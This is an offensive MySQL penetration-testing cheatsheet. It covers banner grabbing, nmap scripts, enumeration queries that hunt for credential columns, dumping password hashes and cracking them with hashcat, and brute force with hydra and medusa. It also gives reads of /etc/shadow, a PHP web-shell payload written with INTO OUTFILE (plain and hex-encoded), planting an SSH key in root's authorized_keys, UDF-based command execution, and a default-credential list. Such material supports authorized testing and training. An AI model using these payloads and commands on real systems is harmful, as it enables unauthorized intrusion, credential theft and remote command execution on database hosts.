MySQL Enumeration Cheatsheet

Default Port: 3306 (TCP). MySQL 8.0 also exposes the X Protocol (mysqlx plugin, enabled by default) on 33060/TCP — include it in the scan.


Connection & Banner Grabbing

# Raw TCP connect prints the server greeting; the version string is readable
# inside the binary packet. Closing without completing the handshake counts
# toward max_connect_errors (default 100) — repeat it enough from one IP and
# the server answers "Host ... is blocked because of many connection errors".
nc -nv <ip> 3306                             # Banner grab
mysql -u root -h <ip>                        # Blank-password attempt (not "no auth")
mysql -u root -p -h <ip>                     # Prompt for password
# Inline password ends up in shell history and is briefly visible in ps;
# prefer the prompt or --defaults-extra-file on anything shared/logged
mysql -u root -p<password> -h <ip>           # Inline password (no space)
mysql -u root -h <ip> -e "SELECT version();" # One-liner query
# Read the error code: 1045 = bad credentials; 1130 = this source host is not
# permitted for the account at all (root is frequently localhost-only), so
# no password will work from here regardless of the wordlist

Nmap Scripts

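# Unauthenticated: protocol version, server version, salt, capability flags
nmap -p 3306 --script mysql-info <ip>
# Authenticated scripts take credentials via --script-args; an empty
# mysqlpass is a genuine blank-password attempt, not anonymous access
nmap -p 3306 --script mysql-databases \
  --script-args mysqluser=root,mysqlpass='' <ip>
nmap -p 3306 --script mysql-users,mysql-variables \
  --script-args mysqluser=root,mysqlpass='' <ip>
# Pull mysql.user hashes for offline cracking (needs SELECT on mysql.user)
nmap -p 3306 --script mysql-dump-hashes \
  --script-args username=root,password='' <ip>
nmap -p 3306 --script mysql-empty-password <ip>        # tries root and anonymous
# Intrusive: produces failed logins (see Brute Force for lockout/throttling risk)
nmap -p 3306 --script mysql-brute <ip>
# Needs creds; checks the server against a CIS-style audit file
nmap -p 3306 --script mysql-audit \
  --script-args mysql-audit.username=root,mysql-audit.password='' <ip>
# Auth bypass in some 5.1/5.5 builds; the script issues many login attempts
nmap -p 3306 --script mysql-vuln-cve2012-2122 <ip>
# Quote the glob so the shell cannot expand it against local files. Note this
# also runs the brute-force and CVE scripts above — it is not a quiet option.
nmap -p 3306 --script "mysql-*" <ip>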

Enumeration Queries

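-- Version and environment
SELECT version();
SELECT @@version;
SELECT @@version_comment;          -- fork/distro: MariaDB, Percona, "MySQL Community Server" ...
SELECT @@version_compile_os;
SELECT user();                     -- name@host the client claimed
SELECT current_user();             -- account actually matched (differs with wildcard hosts)
SELECT @@datadir;
SELECT @@basedir;
SELECT @@hostname;
-- Decides up front whether LOAD_FILE / INTO OUTFILE can work at all (5.7.6+):
--   ''    = unrestricted
--   <dir> = only files under that directory
--   NULL  = file import/export disabled entirely
SHOW VARIABLES LIKE 'secure_file_priv';
SELECT @@plugin_dir;               -- where a UDF library would have to be written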

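-- Databases and tables
SHOW databases;
USE <database>;
SHOW tables;
DESCRIBE <table>;
SELECT * FROM <table> LIMIT 5;     -- peek only; this is enumeration, not export
-- Drop the system schemas so application data stands out
SELECT table_schema, table_name
FROM information_schema.tables
WHERE table_schema NOT IN ('mysql', 'information_schema', 'performance_schema', 'sys');
-- Hunt for credential-bearing columns across every database in one query
SELECT table_schema, table_name, column_name
FROM information_schema.columns
WHERE column_name LIKE '%pass%'
   OR column_name LIKE '%pwd%'
   OR column_name LIKE '%secret%'
   OR column_name LIKE '%token%';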

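-- Users and privileges (reading mysql.user itself requires SELECT on the mysql schema)
-- The plugin column tells you what hash you are looking at:
--   mysql_native_password -> '*' + SHA1(SHA1(pw)); crackable offline (hashcat -m 300, strip the '*')
--   caching_sha2_password -> '$A$...' (8.0 default); far slower to crack
SELECT user, host, plugin, authentication_string FROM mysql.user;
SELECT user, host, password FROM mysql.user;         -- MySQL < 5.7 / MariaDB <= 10.3 (column removed in 5.7)
SELECT user, host, priv FROM mysql.global_priv;      -- MariaDB 10.4+: mysql.user is a view, hashes live here
SELECT * FROM information_schema.user_privileges;    -- global privileges only (FILE, SUPER, ...)
SHOW GRANTS FOR '<user>'@'<host>';
SHOW GRANTS FOR CURRENT_USER();

-- Privileges that turn database access into host access
SELECT user, host, File_priv, Super_priv FROM mysql.user;  -- FILE gates LOAD_FILE / INTO OUTFILE
-- CREATE FUNCTION ... SONAME writes mysql.func, so UDF loading needs INSERT on the mysql schema
SELECT user, host, Insert_priv FROM mysql.user;            -- global INSERT
SELECT user, host, Db, Insert_priv FROM mysql.db WHERE Db = 'mysql';  -- or INSERT granted on mysql.* only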

File Read / Write (Requires FILE Privilege; additionally gated by secure_file_priv and by the OS permissions of the account mysqld runs as)

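-- Everything here runs as the mysqld OS user ('mysql' on Linux packages),
-- not as the database account, and is gated by secure_file_priv — check
-- it before blaming the FILE grant.
SHOW VARIABLES LIKE 'secure_file_priv';

-- Read files. LOAD_FILE() returns NULL rather than an error when the file is
-- missing, unreadable by the mysqld OS user, larger than max_allowed_packet,
-- or outside secure_file_priv. /etc/shadow will be NULL unless mysqld runs as root.
SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('/etc/shadow');
SELECT LOAD_FILE('C:/Windows/System32/drivers/etc/hosts');
SELECT LOAD_FILE('/etc/mysql/my.cnf');              -- server config; also try paths under @@datadir
SELECT HEX(LOAD_FILE('/path/to/binary'));           -- binary-safe read

-- Write files (web shell). INTO OUTFILE refuses to overwrite an existing
-- file, and the target directory must be writable by the mysqld OS user —
-- a default webroot usually is not (Windows installs running as SYSTEM are
-- the common exception). Escaping applies to OUTFILE output; a hex literal
-- plus DUMPFILE writes the bytes exactly as given.
SELECT '<?php system($_GET["cmd"]); ?>'
  INTO OUTFILE '/var/www/html/shell.php';
-- same payload, hex-encoded (0x... is the PHP one-liner above)
SELECT 0x3c3f7068702073797374656d28245f4745545b22636d64225d293b203f3e
  INTO DUMPFILE '/var/www/html/shell.php';

-- Write SSH key. Same constraints: /root/.ssh is not writable by 'mysql',
-- and an existing authorized_keys can neither be overwritten nor appended to.
SELECT 'ssh-rsa AAAA...' INTO OUTFILE '/root/.ssh/authorized_keys';

-- OUTFILE vs DUMPFILE: OUTFILE escapes and adds a newline per row (fine for
-- text); DUMPFILE writes a single row raw — use it for binaries such as a
-- UDF library.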

Brute Force

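# Online guessing. Failed logins do not count toward max_connect_errors, but
# 8.0.19+ accounts can be locked via FAILED_LOGIN_ATTEMPTS/PASSWORD_LOCK_TIME
# and the connection_control plugin adds growing delays after a few failures —
# keep threads low (-t) and stop on ERROR 1130: the source host is rejected
# for that account and no password in the list will change that.
hydra -l root -P wordlist.txt mysql://<ip>
hydra -L users.txt -P wordlist.txt mysql://<ip>
medusa -h <ip> -u root -P wordlist.txt -M mysql
# Offline is quieter: once mysql.user is readable, crack mysql_native_password
# hashes instead (strip the leading '*'; hashcat mode 300 = MySQL4.1/MySQL5)
hashcat -m 300 hashes.txt wordlist.txt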

User-Defined Functions (UDF) for Code Execution / Privilege Escalation — commands run as the mysqld OS user, so this is root only when mysqld itself runs as root

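-- Preconditions (post-login). The library has to land in plugin_dir, which is
-- normally root-owned, so this usually needs a misconfigured directory or a
-- secure_file_priv that allows writing there.
SHOW variables LIKE 'plugin_dir';
SHOW VARIABLES LIKE 'secure_file_priv';    -- '' or a path covering plugin_dir; NULL means no file writes at all
SHOW GRANTS FOR CURRENT_USER();            -- need FILE, plus INSERT on mysql.* (CREATE FUNCTION writes mysql.func)
SELECT * FROM mysql.func;                  -- UDFs already registered (also a useful indicator for defenders)

-- Drop malicious UDF .so/.dll into plugin dir. Use a hex literal + DUMPFILE:
-- OUTFILE escapes bytes and appends a newline, which corrupts a binary.
-- The library must match the server's architecture and libc
-- (lib_mysqludf_sys / raptor_udf2 are the usual sources).
SELECT 0x7f454c46... INTO DUMPFILE '<plugin_dir>/lib_mysqludf_sys.so';

-- Register and execute. sys_exec returns only the exit status; sys_eval
-- returns stdout, so the extra LOAD_FILE round trip is avoidable.
CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id > /tmp/out');
SELECT sys_eval('id');

-- Cleanup: function registrations persist in mysql.func across restarts
DROP FUNCTION sys_exec;
DROP FUNCTION sys_eval;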

Common Credentials to Try (ERROR 1045 means the password is wrong; ERROR 1130 means mysql.user has no row matching your source host — root is often bound to localhost only, so a correct guess can still fail remotely)

root : (blank)
root : root
root : password
root : mysql
root : toor
admin : admin